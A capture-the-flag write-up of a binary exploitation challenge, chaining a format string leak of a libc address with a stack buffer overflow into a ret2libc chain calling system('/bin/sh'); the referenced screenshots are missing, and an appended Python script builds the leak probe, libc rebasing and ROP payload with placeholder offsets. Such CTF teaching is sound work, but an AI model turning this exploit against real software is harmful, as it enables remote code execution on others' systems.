Hey guys, the HackCon18 CTF has just finished, so let's go through the writeup of the "Simple Yet Elegent" pwn. This pwn is based on a format string vulnerability and a buffer overflow. Our goal is to leak a libc address with the format string (because we assume ASLR is enabled), then compute the address of system in the remote libc and spawn a shell.
The first step is to see which protections are enabled:
As we can see, everything is disabled except NX. Let's now run the binary:
OK, the process echoes our input back. Let's now try a format string:
As we can see, it prints addresses from the process's stack. And if we give it a large input:
there is a segmentation fault. Let's jump into radare2 to look at the assembly of this binary:
the main function reads the input with scanf, and that is where the overflow happens. Now let's examine the core dump with gdb:
This way we computed the size of the buffer, i.e. the distance from the start of our input to the saved return address. Now we must examine the stack to find a libc address we can leak with the format string. For this we run the program in gdb and break on printf, because the format string reads the stack exactly as printf sees it:
Good, there is an address inside __libc_start_main, but there is a problem: if we insert an input large enough to overwrite the return address, our input overwrites this address too! So we look for another libc address and use that instead. In particular there is 0x00007ffff7a6287d right at the start of our format string output, but only on the remote! (For the moment I do not know why, but maybe it is due to the different libc version.) This address may be the fflush function, but I'm not sure, so we calculate the difference between this value and the __libc_start_main address in order to obtain the latter.
Run the remote process to obtain these two values:
where %1$p is the positional argument that gives our mysterious address and %17$p is the one that gives the __libc_start_main address. The difference between these two addresses is:
OK, now we have a valid libc address! Next we get the start of __libc_start_main and then look up the offsets of system and the "/bin/sh" string. For this we examine the libc that was given to us:
where 0x21f45 corresponds to the leaked __libc_start_main address, which is 245 bytes past the start of __libc_start_main! Now we can calculate the libc base (leak minus 0x21f45) and then system and "/bin/sh". A quick sanity check: the computed base must end in 000, since ASLR moves libc by whole pages; if it does not, either the offset or the libc version is wrong. Now run libc-database to get the offsets of system and "/bin/sh":
Now let's search for a gadget (pop rdi; ret) to put the "/bin/sh" address into the rdi register:
OK, now we have all the ingredients for our script:
Now let's run it:
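To make the exploit-side arithmetic concrete, here is an added example; it is not the writeup's script and it never contacts the remote service. It builds the `%N$p` probe, parses the pointers printf echoes back, checks that the candidate leak keeps the low 12 bits of `__libc_start_main+245` (0x...f45, since ASLR only shifts libc by whole pages), rebases with the 0x21f45 offset quoted above, and assembles the padding plus `pop rdi; ret` / `"/bin/sh"` / `system` chain. The system and "/bin/sh" offsets, the gadget addresses, the buffer-to-return-address distance and the echoed sample output are hypothetical placeholders (the writeup's screenshots are not reproduced here), to be replaced with the real values from libc-database, ROPgadget and the core dump.

```python
"""Leak -> libc base -> ROP chain, as an added example (not the writeup's script).

Values quoted in the writeup are derived as such; everything marked
"hypothetical" is a placeholder for a value taken from the real binary/libc.
"""
import re
import struct
from typing import List

# From the writeup: the leaked value is the return address inside
# __libc_start_main, 245 bytes past its start, at libc offset 0x21f45.
LEAK_OFF = 0x21F45
LIBC_START_MAIN_OFF = LEAK_OFF - 245          # 0x21e50

# Hypothetical placeholders: take the real ones from libc-database / ROPgadget / gdb.
SYSTEM_OFF = 0x45390       # offset of system() in the given libc
BINSH_OFF = 0x18C177       # offset of the "/bin/sh" string in the given libc
POP_RDI_RET = 0x400763     # `pop rdi; ret` in the non-PIE binary
RET = 0x400564             # a lone `ret`, optional stack realignment before system()
BUF_TO_RET = 72            # bytes from the start of the buffer to the saved RIP

# Constructed sample of what the remote printf might echo for probe([1, 17]):
# a stack pointer first, then the __libc_start_main return address.
SAMPLE_OUTPUT = b"0x7ffd1c3e0a40.0x7f8c2a1fcf45"

SCANF_WHITESPACE = set(b" \t\n\v\f\r")


def probe(indices: List[int]) -> bytes:
    """Format string printing the chosen positional stack slots as pointers."""
    return b".".join(b"%%%d$p" % i for i in indices)


def parse_pointers(output: bytes) -> List[int]:
    """Every 0x... token echoed back by printf, in probe order."""
    return [int(tok, 16) for tok in re.findall(rb"0x[0-9a-fA-F]+", output)]


def is_plausible_leak(addr: int) -> bool:
    """ASLR is page granular, so libc+LEAK_OFF always ends in the same 12 bits."""
    return (addr & 0xFFF) == (LEAK_OFF & 0xFFF)


def libc_candidates(values: List[int]) -> List[int]:
    """Positions (in probe order) whose value could be the libc return address."""
    return [i for i, v in enumerate(values) if is_plausible_leak(v)]


def libc_base(leak: int) -> int:
    """Rebase; the result must be page aligned or the offset/libc is wrong."""
    if not is_plausible_leak(leak):
        raise ValueError("leak 0x%x does not end in 0x%03x: wrong slot or wrong libc"
                         % (leak, LEAK_OFF & 0xFFF))
    base = leak - LEAK_OFF
    assert base & 0xFFF == 0
    return base


def build_payload(base: int, realign: bool = False) -> bytes:
    """Padding up to the saved RIP, then [ret;] pop rdi; ret / "/bin/sh" / system.

    realign=True prepends a bare `ret`: on x86-64 glibc, system() can crash on a
    movaps if rsp is not 16-byte aligned when it is entered.
    """
    chain = [RET] if realign else []
    chain += [POP_RDI_RET, base + BINSH_OFF, base + SYSTEM_OFF]
    return b"A" * BUF_TO_RET + b"".join(struct.pack("<Q", a) for a in chain)


def scanf_safe(payload: bytes) -> bool:
    """scanf("%s") stops at the first whitespace byte (NUL bytes are fine, which
    is why 0x00007f.. addresses survive). A 0x20 or 0x0a inside an address
    would truncate the chain, so check before sending."""
    return not (SCANF_WHITESPACE & set(payload))


def solve(leak_output: bytes, realign: bool = False) -> bytes:
    """Pick the single plausible libc slot, rebase, build and validate the chain."""
    values = parse_pointers(leak_output)
    cands = libc_candidates(values)
    if len(cands) != 1:
        raise ValueError("expected exactly one libc-looking slot, got %r" % cands)
    payload = build_payload(libc_base(values[cands[0]]), realign)
    if not scanf_safe(payload):
        raise ValueError("payload contains a scanf whitespace byte; change padding or gadget")
    return payload


if __name__ == "__main__":
    print(probe([1, 17]))
    print(hex(libc_base(parse_pointers(SAMPLE_OUTPUT)[1])))
    print(solve(SAMPLE_OUTPUT).hex())
```

In a live run the first line sent is `probe([...])`, the echoed line is fed to `solve`, and the returned payload is sent as the second input; the two checks (low 12 bits of the leak, no whitespace byte in the chain) are the ones that most often explain a silent failure of this kind of exploit.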